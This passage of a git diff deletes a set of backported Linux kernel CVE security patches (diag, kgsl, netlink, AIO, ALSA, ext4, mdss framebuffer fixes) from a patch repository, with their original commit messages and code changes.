(pkt_params.count > count_entries) { -+ params++; - } else { - mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); - return success; - } - } -+ kfree(head_params); - mutex_unlock(&driver->diagchar_mutex); - } else { - mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); - pr_err("Max size reached, Pkt Registration failed 
for" - " Process %d", current->tgid); - } - success = 0; - } else if (iocmd == DIAG_IOCTL_GET_DELAYED_RSP_ID) { -- struct diagpkt_delay_params *delay_params = -- (struct diagpkt_delay_params *) ioarg; -- -- if ((delay_params->rsp_ptr) && -- (delay_params->size == sizeof(delayed_rsp_id)) && -- (delay_params->num_bytes_ptr)) { -- *((uint16_t *)delay_params->rsp_ptr) = -- DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id); -- *(delay_params->num_bytes_ptr) = sizeof(delayed_rsp_id); -+ struct diagpkt_delay_params delay_params; -+ uint16_t interim_rsp_id; -+ int interim_size; -+ if (copy_from_user(&delay_params, (void *)ioarg, -+ sizeof(struct diagpkt_delay_params))) -+ return -EFAULT; -+ if ((delay_params.rsp_ptr) && -+ (delay_params.size == sizeof(delayed_rsp_id)) && -+ (delay_params.num_bytes_ptr)) { -+ interim_rsp_id = DIAGPKT_NEXT_DELAYED_RSP_ID( -+ delayed_rsp_id); -+ if (copy_to_user((void *)delay_params.rsp_ptr, -+ &interim_rsp_id, sizeof(uint16_t))) -+ return -EFAULT; -+ interim_size = sizeof(delayed_rsp_id); -+ if (copy_to_user((void *)delay_params.num_bytes_ptr, -+ &interim_size, sizeof(int))) -+ return -EFAULT; - success = 0; - } - } else if (iocmd == DIAG_IOCTL_DCI_REG) { -@@ -479,7 +553,13 @@ long diagchar_ioctl(struct file *filp, - return DIAG_DCI_NO_REG; - if (driver->num_dci_client >= MAX_DCI_CLIENTS) - return DIAG_DCI_NO_REG; -- if (copy_from_user(params, (void *)ioarg, -+ dci_params = kzalloc(sizeof(struct diag_dci_client_tbl), -+ GFP_KERNEL); -+ if (dci_params == NULL) { -+ pr_err("diag: unable to alloc memory\n"); -+ return -ENOMEM; -+ } -+ if (copy_from_user(dci_params, (void *)ioarg, - sizeof(struct diag_dci_client_tbl))) - return -EFAULT; - mutex_lock(&driver->dci_mutex); -@@ -492,9 +572,9 @@ long diagchar_ioctl(struct file *filp, - if (driver->dci_client_tbl[i].client == NULL) { - driver->dci_client_tbl[i].client = current; - driver->dci_client_tbl[i].list = -- params->list; -+ dci_params->list; - driver->dci_client_tbl[i].signal_type = -- 
params->signal_type; -+ dci_params->signal_type; - create_dci_log_mask_tbl(driver-> - dci_client_tbl[i].dci_log_mask); - create_dci_event_mask_tbl(driver-> -@@ -512,6 +592,7 @@ long diagchar_ioctl(struct file *filp, - } - } - mutex_unlock(&driver->dci_mutex); -+ kfree(dci_params); - return driver->dci_client_id; - } else if (iocmd == DIAG_IOCTL_DCI_DEINIT) { - success = -1; -@@ -536,25 +617,29 @@ long diagchar_ioctl(struct file *filp, - } else if (iocmd == DIAG_IOCTL_DCI_SUPPORT) { - if (driver->ch_dci) - support_list = support_list | DIAG_CON_MPSS; -- *(uint16_t *)ioarg = support_list; -+ if (copy_to_user((void *)ioarg, &support_list, -+ sizeof(uint16_t))) -+ return -EFAULT; - return DIAG_DCI_NO_ERROR; - } else if (iocmd == DIAG_IOCTL_DCI_HEALTH_STATS) { - if (copy_from_user(&stats, (void *)ioarg, - sizeof(struct diag_dci_health_stats))) - return -EFAULT; - for (i = 0; i < MAX_DCI_CLIENTS; i++) { -- params = &(driver->dci_client_tbl[i]); -- if (params->client && -- params->client->tgid == current->tgid) { -- stats.dropped_logs = params->dropped_logs; -- stats.dropped_events = params->dropped_events; -- stats.received_logs = params->received_logs; -- stats.received_events = params->received_events; -+ dci_params = &(driver->dci_client_tbl[i]); -+ if (dci_params->client && -+ dci_params->client->tgid == current->tgid) { -+ stats.dropped_logs = dci_params->dropped_logs; -+ stats.dropped_events = -+ dci_params->dropped_events; -+ stats.received_logs = dci_params->received_logs; -+ stats.received_events = -+ dci_params->received_events; - if (stats.reset_status) { -- params->dropped_logs = 0; -- params->dropped_events = 0; -- params->received_logs = 0; -- params->received_events = 0; -+ dci_params->dropped_logs = 0; -+ dci_params->dropped_events = 0; -+ dci_params->received_logs = 0; -+ dci_params->received_events = 0; - } - break; - } -@@ -567,7 +652,7 @@ long diagchar_ioctl(struct file *filp, - for (i = 0; i < driver->num_clients; i++) - if (driver->client_map[i].pid 
== current->tgid) - break; -- if (i == -1) -+ if (i == driver->num_clients) - return -EINVAL; - driver->data_ready[i] |= DEINIT_TYPE; - wake_up_interruptible(&driver->wait_q); -@@ -1068,7 +1153,7 @@ static int diagchar_write(struct file *file, const char __user *buf, - struct diag_send_desc_type send = { NULL, NULL, DIAG_STATE_START, 0 }; - struct diag_hdlc_dest_type enc = { NULL, NULL, 0 }; - void *buf_copy = NULL; -- int payload_size; -+ unsigned int payload_size; - #ifdef CONFIG_DIAG_OVER_USB - if (((driver->logging_mode == USB_MODE) && (!driver->usb_connected)) || - (driver->logging_mode == NO_LOGGING_MODE)) { -@@ -1079,8 +1164,17 @@ static int diagchar_write(struct file *file, const char __user *buf, - /* Get the packet type F3/log/event/Pkt response */ - err = copy_from_user((&pkt_type), buf, 4); - /* First 4 bytes indicate the type of payload - ignore these */ -+ if (count < 4) { -+ pr_err("diag: Client sending short data\n"); -+ return -EBADMSG; -+ } - payload_size = count - 4; -- -+ if (payload_size > USER_SPACE_DATA) { -+ pr_err("diag: Dropping packet, packet payload size crosses 8KB limit. Current payload size %d\n", -+ payload_size); -+ driver->dropped_count++; -+ return -EBADMSG; -+ } - if (pkt_type == DCI_DATA_TYPE) { - err = copy_from_user(driver->user_space_data, buf + 4, - payload_size); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2012-4222/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-4222/ANY/0001.patch deleted file mode 100644 index 364b4eb5..00000000 --- a/Patches/Linux_CVEs/CVE-2012-4222/ANY/0001.patch +++ /dev/null 
@@ -1,65 +0,0 @@
-From 1e76f61bb001b93795a227f8f808104b6c10b048 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse
-Date: Wed, 8 Aug 2012 13:24:21 -0600
-Subject: msm: kgsl: Detect and avoid malformed ioctl codes
-
-Because we were using _IO_NR, one could construct a malformed ioctl
-code that would avoid allocating memory yet go to a function that
-expected that memory. Still use _IO_NR to index the array of ioctls,
-but check that the full values match before jumping to the helper
-function.
-
-CRs-fixed: 385592
-Change-Id: Ic0dedbaded469035bd0a2bb0f20fecb2a3045ca5
-Signed-off-by: Jordan Crouse
----
- drivers/gpu/msm/kgsl.c | 19 +++++++++++++++++--
- 1 file changed, 17 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 57a0e2b..53eff77 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -2176,7 +2176,7 @@ static const struct {
- static long kgsl_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
- {
- struct kgsl_device_private *dev_priv = filep->private_data;
-- unsigned int nr = _IOC_NR(cmd);
-+ unsigned int nr;
- kgsl_ioctl_func_t func;
- int lock, ret;
- char ustack[64];
-@@ -2192,6 +2192,8 @@ static long kgsl_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
- else if (cmd == IOCTL_KGSL_CMDSTREAM_READTIMESTAMP_OLD)
- cmd = IOCTL_KGSL_CMDSTREAM_READTIMESTAMP;
-
-+ nr = _IOC_NR(cmd);
-+
- if (cmd & (IOC_IN | IOC_OUT)) {
- if (_IOC_SIZE(cmd) < sizeof(ustack))
- uptr = ustack;
-@@ -2216,7 +2218,20 @@ static long kgsl_ioctl(struct file *filep, unsigned int cmd, unsigned long arg)
- }
-
- if (nr < ARRAY_SIZE(kgsl_ioctl_funcs) &&
-- kgsl_ioctl_funcs[nr].func != NULL) {
-+ kgsl_ioctl_funcs[nr].func != NULL) {
-+
-+ /*
-+ * Make sure that nobody tried to send us a malformed ioctl code
-+ * with a valid NR but bogus flags
-+ */
-+
-+ if (kgsl_ioctl_funcs[nr].cmd != cmd) {
-+ KGSL_DRV_ERR(dev_priv->device,
-+ "Malformed ioctl code %08x\n", cmd);
-+ ret = -ENOIOCTLCMD;
-+ goto done;
-+ }
-+
- func = kgsl_ioctl_funcs[nr].func;
- lock = kgsl_ioctl_funcs[nr].lock;
- } else {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6657/^3.5/0001.patch b/Patches/Linux_CVEs/CVE-2012-6657/^3.5/0001.patch
deleted file mode 100644
index 3011c22d..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6657/^3.5/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 3e10986d1d698140747fcfc2761ec9cb64c1d582 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Mon, 24 Sep 2012 07:00:11 +0000
-Subject: net: guard tcp_set_keepalive() to tcp sockets
-
-Its possible to use RAW sockets to get a crash in
-tcp_set_keepalive() / sk_reset_timer()
-
-Fix is to make sure socket is a SOCK_STREAM one.
-
-Reported-by: Dave Jones
-Signed-off-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/core/sock.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/sock.c b/net/core/sock.c
-index 3057920..a6000fb 100644
---- a/net/core/sock.c
-+++ b/net/core/sock.c
-@@ -691,7 +691,8 @@ set_rcvbuf:
-
- case SO_KEEPALIVE:
- #ifdef CONFIG_INET
-- if (sk->sk_protocol == IPPROTO_TCP)
-+ if (sk->sk_protocol == IPPROTO_TCP &&
-+ sk->sk_type == SOCK_STREAM)
- tcp_set_keepalive(sk, valbool);
- #endif
- sock_valbool_flag(sk, SOCK_KEEPOPEN, valbool);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6689/^3.5/0001.patch b/Patches/Linux_CVEs/CVE-2012-6689/^3.5/0001.patch
deleted file mode 100644
index 5cc076af..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6689/^3.5/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From 20e1db19db5d6b9e4e83021595eab0dc8f107bef Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso
-Date: Thu, 23 Aug 2012 02:09:11 +0000
-Subject: netlink: fix possible spoofing from non-root processes
-
-Non-root user-space processes can send Netlink messages to other
-processes that are well-known for being subscribed to Netlink
-asynchronous notifications. This allows ilegitimate non-root
-process to send forged messages to Netlink subscribers.
-
-The userspace process usually verifies the legitimate origin in
-two ways:
-
-a) Socket credentials. If UID != 0, then the message comes from
- some ilegitimate process and the message needs to be dropped.
-
-b) Netlink portID. In general, portID == 0 means that the origin
- of the messages comes from the kernel. Thus, discarding any
- message not coming from the kernel.
-
-However, ctnetlink sets the portID in event messages that has
-been triggered by some user-space process, eg. conntrack utility.
-So other processes subscribed to ctnetlink events, eg. conntrackd,
-know that the event was triggered by some user-space action.
-
-Neither of the two ways to discard ilegitimate messages coming
-from non-root processes can help for ctnetlink.
-
-This patch adds capability validation in case that dst_pid is set
-in netlink_sendmsg(). This approach is aggressive since existing
-applications using any Netlink bus to deliver messages between
-two user-space processes will break. Note that the exception is
-NETLINK_USERSOCK, since it is reserved for netlink-to-netlink
-userspace communication.
-
-Still, if anyone wants that his Netlink bus allows netlink-to-netlink
-userspace, then they can set NL_NONROOT_SEND. However, by default,
-I don't think it makes sense to allow to use NETLINK_ROUTE to
-communicate two processes that are sending no matter what information
-that is not related to link/neighbouring/routing. They should be using
-NETLINK_USERSOCK instead for that.
-
-Signed-off-by: Pablo Neira Ayuso
-Signed-off-by: David S. Miller
----
- net/netlink/af_netlink.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
-index 1445d73..5270238 100644
---- a/net/netlink/af_netlink.c
-+++ b/net/netlink/af_netlink.c
-@@ -1373,7 +1373,8 @@ static int netlink_sendmsg(struct kiocb *kiocb, struct socket *sock,
- dst_pid = addr->nl_pid;
- dst_group = ffs(addr->nl_groups);
- err = -EPERM;
-- if (dst_group && !netlink_capable(sock, NL_NONROOT_SEND))
-+ if ((dst_group || dst_pid) &&
-+ !netlink_capable(sock, NL_NONROOT_SEND))
- goto out;
- } else {
- dst_pid = nlk->dst_pid;
-@@ -2147,6 +2148,7 @@ static void __init netlink_add_usersock_entry(void)
- rcu_assign_pointer(nl_table[NETLINK_USERSOCK].listeners, listeners);
- nl_table[NETLINK_USERSOCK].module = THIS_MODULE;
- nl_table[NETLINK_USERSOCK].registered = 1;
-+ nl_table[NETLINK_USERSOCK].nl_nonroot = NL_NONROOT_SEND;
-
- netlink_table_ungrab();
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6701/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-6701/ANY/0001.patch
deleted file mode 100644
index 7b75df93..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6701/ANY/0001.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From a70b52ec1aaeaf60f4739edb1b422827cb6f3893 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds
-Date: Mon, 21 May 2012 16:06:20 -0700
-Subject: vfs: make AIO use the proper rw_verify_area() area helpers
-
-We had for some reason overlooked the AIO interface, and it didn't use
-the proper rw_verify_area() helper function that checks (for example)
-mandatory locking on the file, and that the size of the access doesn't
-cause us to overflow the provided offset limits etc.
-
-Instead, AIO did just the security_file_permission() thing (that
-rw_verify_area() also does) directly.
-
-This fixes it to do all the proper helper functions, which not only
-means that now mandatory file locking works with AIO too, we can
-actually remove lines of code.
-
-Reported-by: Manish Honap
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
----
- fs/aio.c | 30 ++++++++++++++----------------
- 1 file changed, 14 insertions(+), 16 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 67a6db3..e7f2fad 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1456,6 +1456,10 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat)
- if (ret < 0)
- goto out;
-
-+ ret = rw_verify_area(type, kiocb->ki_filp, &kiocb->ki_pos, ret);
-+ if (ret < 0)
-+ goto out;
-+
- kiocb->ki_nr_segs = kiocb->ki_nbytes;
- kiocb->ki_cur_seg = 0;
- /* ki_nbytes/left now reflect bytes instead of segs */
-@@ -1467,11 +1471,17 @@ out:
- return ret;
- }
-
--static ssize_t aio_setup_single_vector(struct kiocb *kiocb)
-+static ssize_t aio_setup_single_vector(int type, struct file * file, struct kiocb *kiocb)
- {
-+ int bytes;
-+
-+ bytes = rw_verify_area(type, file, &kiocb->ki_pos, kiocb->ki_left);
-+ if (bytes < 0)
-+ return bytes;
-+
- kiocb->ki_iovec = &kiocb->ki_inline_vec;
- kiocb->ki_iovec->iov_base = kiocb->ki_buf;
-- kiocb->ki_iovec->iov_len = kiocb->ki_left;
-+ kiocb->ki_iovec->iov_len = bytes;
- kiocb->ki_nr_segs = 1;
- kiocb->ki_cur_seg = 0;
- return 0;
-@@ -1496,10 +1506,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- if (unlikely(!access_ok(VERIFY_WRITE, kiocb->ki_buf,
- kiocb->ki_left)))
- break;
-- ret = security_file_permission(file, MAY_READ);
-- if (unlikely(ret))
-- break;
-- ret = aio_setup_single_vector(kiocb);
-+ ret = aio_setup_single_vector(READ, file, kiocb);
- if (ret)
- break;
- ret = -EINVAL;
-@@ -1514,10 +1521,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- if (unlikely(!access_ok(VERIFY_READ, kiocb->ki_buf,
- kiocb->ki_left)))
- break;
-- ret = security_file_permission(file, MAY_WRITE);
-- if (unlikely(ret))
-- break;
-- ret = aio_setup_single_vector(kiocb);
-+ ret = aio_setup_single_vector(WRITE, file, kiocb);
- if (ret)
- break;
- ret = -EINVAL;
-@@ -1528,9 +1532,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- ret = -EBADF;
- if (unlikely(!(file->f_mode & FMODE_READ)))
- break;
-- ret = security_file_permission(file, MAY_READ);
-- if (unlikely(ret))
-- break;
- ret = aio_setup_vectored_rw(READ, kiocb, compat);
- if (ret)
- break;
-@@ -1542,9 +1543,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- ret = -EBADF;
- if (unlikely(!(file->f_mode & FMODE_WRITE)))
- break;
-- ret = security_file_permission(file, MAY_WRITE);
-- if (unlikely(ret))
-- break;
- ret = aio_setup_vectored_rw(WRITE, kiocb, compat);
- if (ret)
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-6703/ANY/0001.patch
deleted file mode 100644
index 1ae40584..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From b35cc8225845112a616e3a2266d2fde5ab13d3ab Mon Sep 17 00:00:00 2001
-From: Dan Carpenter
-Date: Wed, 5 Sep 2012 15:32:18 +0300
-Subject: [PATCH] ALSA: compress_core: integer overflow in
- snd_compr_allocate_buffer()
-
-These are 32 bit values that come from the user, we need to check for
-integer overflows or we could end up allocating a smaller buffer than
-expected.
-
-Signed-off-by: Dan Carpenter
-Signed-off-by: Takashi Iwai
----
- sound/core/compress_offload.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index eb60cb8dbb8a6..68fe02c7400a2 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -407,6 +407,10 @@ static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
- unsigned int buffer_size;
- void *buffer;
-
-+ if (params->buffer.fragment_size == 0 ||
-+ params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
-+ return -EINVAL;
-+
- buffer_size = params->buffer.fragment_size * params->buffer.fragments;
- if (stream->ops->copy) {
- buffer = NULL;
diff --git a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2012-6703/ANY/0002.patch
deleted file mode 100644
index d3ff0972..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6703/ANY/0002.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-From 4dc040a0b34890d2adc0d63da6e9bfb4eb791b19 Mon Sep 17 00:00:00 2001
-From: Vinod Koul
-Date: Mon, 17 Sep 2012 11:51:25 +0530
-Subject: [PATCH] ALSA: compress - move the buffer check
-
-Commit ALSA: compress_core: integer overflow in snd_compr_allocate_buffer()
-added a new error check for input params.
-this add new routine for input checks and moves buffer overflow check to this
-new routine. This allows the error value to be propogated to user space
-
-Signed-off-by: Vinod Koul
-Signed-off-by: Takashi Iwai
----
- sound/core/compress_offload.c | 20 ++++++++++++++++----
- 1 file changed, 16 insertions(+), 4 deletions(-)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index 68fe02c7400a2..bd7f28e892540 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -407,10 +407,6 @@ static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
- unsigned int buffer_size;
- void *buffer;
-
-- if (params->buffer.fragment_size == 0 ||
-- params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
-- return -EINVAL;
--
- buffer_size = params->buffer.fragment_size * params->buffer.fragments;
- if (stream->ops->copy) {
- buffer = NULL;
-@@ -429,6 +425,16 @@ static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
- return 0;
- }
-
-+static int snd_compress_check_input(struct snd_compr_params *params)
-+{
-+ /* first let's check the buffer parameter's */
-+ if (params->buffer.fragment_size == 0 ||
-+ params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
-+ return -EINVAL;
-+
-+ return 0;
-+}
-+
- static int
- snd_compr_set_params(struct snd_compr_stream *stream, unsigned long arg)
- {
-@@ -447,11 +453,17 @@ snd_compr_set_params(struct snd_compr_stream *stream, unsigned long arg)
- retval = -EFAULT;
- goto out;
- }
-+
-+ retval = snd_compress_check_input(params);
-+ if (retval)
-+ goto out;
-+
- retval = snd_compr_allocate_buffer(stream, params);
- if (retval) {
- retval = -ENOMEM;
- goto out;
- }
-+
- retval = stream->ops->set_params(stream, params);
- if (retval)
- goto out;
diff --git a/Patches/Linux_CVEs/CVE-2012-6704/^3.5/0001.patch b/Patches/Linux_CVEs/CVE-2012-6704/^3.5/0001.patch
deleted file mode 100644
index 494c9003..00000000
--- a/Patches/Linux_CVEs/CVE-2012-6704/^3.5/0001.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 82981930125abfd39d7c8378a9cfdf5e1be2002b Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Thu, 26 Apr 2012 20:07:59 +0000
-Subject: [PATCH] net: cleanups in sock_setsockopt()
-
-Use min_t()/max_t() macros, reformat two comments, use !!test_bit() to
-match !!sock_flag()
-
-Signed-off-by: Eric Dumazet
-Signed-off-by: David S. Miller
----
- net/core/sock.c | 42 +++++++++++++++---------------------------
- 1 file changed, 15 insertions(+), 27 deletions(-)
-
-diff --git a/net/core/sock.c b/net/core/sock.c
-index 0431aaf7473a2..10605d2ec8606 100644
---- a/net/core/sock.c
-+++ b/net/core/sock.c
-@@ -577,23 +577,15 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
- break;
- case SO_SNDBUF:
- /* Don't error on this BSD doesn't and if you think
-- about it this is right. Otherwise apps have to
-- play 'guess the biggest size' games. RCVBUF/SNDBUF
-- are treated in BSD as hints */
--
-- if (val > sysctl_wmem_max)
-- val = sysctl_wmem_max;
-+ * about it this is right. Otherwise apps have to
-+ * play 'guess the biggest size' games. RCVBUF/SNDBUF
-+ * are treated in BSD as hints
-+ */
-+ val = min_t(u32, val, sysctl_wmem_max);
- set_sndbuf:
- sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
-- if ((val * 2) < SOCK_MIN_SNDBUF)
-- sk->sk_sndbuf = SOCK_MIN_SNDBUF;
-- else
-- sk->sk_sndbuf = val * 2;
--
-- /*
-- * Wake up sending tasks if we
-- * upped the value.
-- */
-+ sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
-+ /* Wake up sending tasks if we upped the value. */
- sk->sk_write_space(sk);
- break;
-
-@@ -606,12 +598,11 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
-
- case SO_RCVBUF:
- /* Don't error on this BSD doesn't and if you think
-- about it this is right. Otherwise apps have to
-- play 'guess the biggest size' games. RCVBUF/SNDBUF
-- are treated in BSD as hints */
--
-- if (val > sysctl_rmem_max)
-- val = sysctl_rmem_max;
-+ * about it this is right. Otherwise apps have to
-+ * play 'guess the biggest size' games. RCVBUF/SNDBUF
-+ * are treated in BSD as hints
-+ */
-+ val = min_t(u32, val, sysctl_rmem_max);
- set_rcvbuf:
- sk->sk_userlocks |= SOCK_RCVBUF_LOCK;
- /*
-@@ -629,10 +620,7 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
- * returning the value we actually used in getsockopt
- * is the most desirable behavior.
- */
-- if ((val * 2) < SOCK_MIN_RCVBUF)
-- sk->sk_rcvbuf = SOCK_MIN_RCVBUF;
-- else
-- sk->sk_rcvbuf = val * 2;
-+ sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
- break;
-
- case SO_RCVBUFFORCE:
-@@ -975,7 +963,7 @@ int sock_getsockopt(struct socket *sock, int level, int optname,
- break;
-
- case SO_PASSCRED:
-- v.val = test_bit(SOCK_PASSCRED, &sock->flags) ? 1 : 0;
-+ v.val = !!test_bit(SOCK_PASSCRED, &sock->flags);
- break;
-
- case SO_PEERCRED:
-@@ -1010,7 +998,7 @@ int sock_getsockopt(struct socket *sock, int level, int optname,
- break;
-
- case SO_PASSSEC:
-- v.val = test_bit(SOCK_PASSSEC, &sock->flags) ? 1 : 0;
-+ v.val = !!test_bit(SOCK_PASSSEC, &sock->flags);
- break;
-
- case SO_PEERSEC:
diff --git a/Patches/Linux_CVEs/CVE-2013-2015/^3.8/0001.patch b/Patches/Linux_CVEs/CVE-2013-2015/^3.8/0001.patch
deleted file mode 100644
index fd44f2cf..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2015/^3.8/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 016a3592cc34fa349235b5a8b48af5cece2cbfeb Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o
-Date: Thu, 27 Dec 2012 01:42:50 -0500
-Subject: [PATCH] ext4: avoid hang when mounting non-journal filesystems with
- orphan list
-
-commit 0e9a9a1ad619e7e987815d20262d36a2f95717ca upstream.
-
-When trying to mount a file system which does not contain a journal,
-but which does have a orphan list containing an inode which needs to
-be truncated, the mount call with hang forever in
-ext4_orphan_cleanup() because ext4_orphan_del() will return
-immediately without removing the inode from the orphan list, leading
-to an uninterruptible loop in kernel code which will busy out one of
-the CPU's on the system.
-
-This can be trivially reproduced by trying to mount the file system
-found in tests/f_orphan_extents_inode/image.gz from the e2fsprogs
-source tree. If a malicious user were to put this on a USB stick, and
-mount it on a Linux desktop which has automatic mounts enabled, this
-could be considered a potential denial of service attack. (Not a big
-deal in practice, but professional paranoids worry about such things,
-and have even been known to allocate CVE numbers for such problems.)
-
--js: This is a fix for CVE-2013-2015.
-
-Signed-off-by: "Theodore Ts'o"
-Reviewed-by: Zheng Liu
-Acked-by: Jan Kara
-Signed-off-by: Greg Kroah-Hartman
----
- fs/ext4/namei.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
-index 9fb3fae4898a..54ad9a54cd89 100644
---- a/fs/ext4/namei.c
-+++ b/fs/ext4/namei.c
-@@ -2054,7 +2054,8 @@ int ext4_orphan_del(handle_t *handle, struct inode *inode)
- int err = 0;
-
- /* ext4_handle_valid() assumes a valid handle_t pointer */
-- if (handle && !ext4_handle_valid(handle))
-+ if (handle && !ext4_handle_valid(handle) &&
-+ !(EXT4_SB(inode->i_sb)->s_mount_state & EXT4_ORPHAN_FS))
- return 0;
-
- mutex_lock(&EXT4_SB(inode->i_sb)->s_orphan_lock);
diff --git a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-2596/ANY/0001.patch
deleted file mode 100644
index 78f882fa..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 24b51892b863ad23a9fcb2a28a45e5cc15c2f3b5 Mon Sep 17 00:00:00 2001
-From: Manoj Rao
-Date: Tue, 16 Apr 2013 17:42:38 -0700
-Subject: mdss: mdss_fb: remove mmio access through mmap
-
-Disable access to mm io and add
-appropriate range checks to ensure valid accesses
-through framebuffer mmap. This prevents illegal
-access into memory.
-
-Change-Id: Ic6e47ec726d330d48ce9a7a708418492a553543b
-CRs-Fixed: 474706
-Signed-off-by: Manoj Rao
----
- drivers/video/msm/mdss/mdss_fb.c | 16 +++++-----------
- 1 file changed, 5 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index e2d8cf6..f42df2a 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -669,22 +669,16 @@ static int mdss_fb_mmap(struct fb_info *info, struct vm_area_struct *vma)
- }
-
- mdss_fb_pan_idle(mfd);
-- if (off >= len) {
-- /* memory mapped io */
-- off -= len;
-- if (info->var.accel_flags) {
-- mutex_unlock(&info->lock);
-- return -EINVAL;
-- }
-- start = info->fix.mmio_start;
-- len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
-- }
-
- /* Set VM flags. */
- start &= PAGE_MASK;
-- if ((vma->vm_end - vma->vm_start + off) > len)
-+ if ((vma->vm_end <= vma->vm_start) ||
-+ (off >= len) ||
-+ ((vma->vm_end - vma->vm_start) > (len - off)))
- return -EINVAL;
- off += start;
-+ if (off < start)
-+ return -EINVAL;
- vma->vm_pgoff = off >> PAGE_SHIFT;
- /* This is an IO map - tell maydump to skip this VMA */
- vma->vm_flags |= VM_IO | VM_RESERVED;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-2596/ANY/0002.patch
deleted file mode 100644
index 6e74acaa..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0002.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 7e9785f78415d32e0b17b1d296a172b66e0d2ab7 Mon Sep 17 00:00:00 2001
-From: Manoj Rao
-Date: Fri, 12 Apr 2013 18:37:14 -0700
-Subject: msm: msm_fb: remove mmio access through mmap
-
-Disable access to mm io and add
-appropriate range checks to ensure valid accesses
-through framebuffer mmap. This prevents illegal
-access into memory.
-
-CRs-Fixed: 474706
-Change-Id: If25166f2732433ef967e99c716440030b567aae9
-Signed-off-by: Manoj Rao
-(cherry picked from commit b571bef36cf51f9bb4cd1ad3ba23e3cee6d1d3cb)
-
-Conflicts:
-
- drivers/video/msm/msm_fb.c
-
-Signed-off-by: Raviteja
----
- drivers/video/msm/msm_fb.c | 22 ++++++++++------------
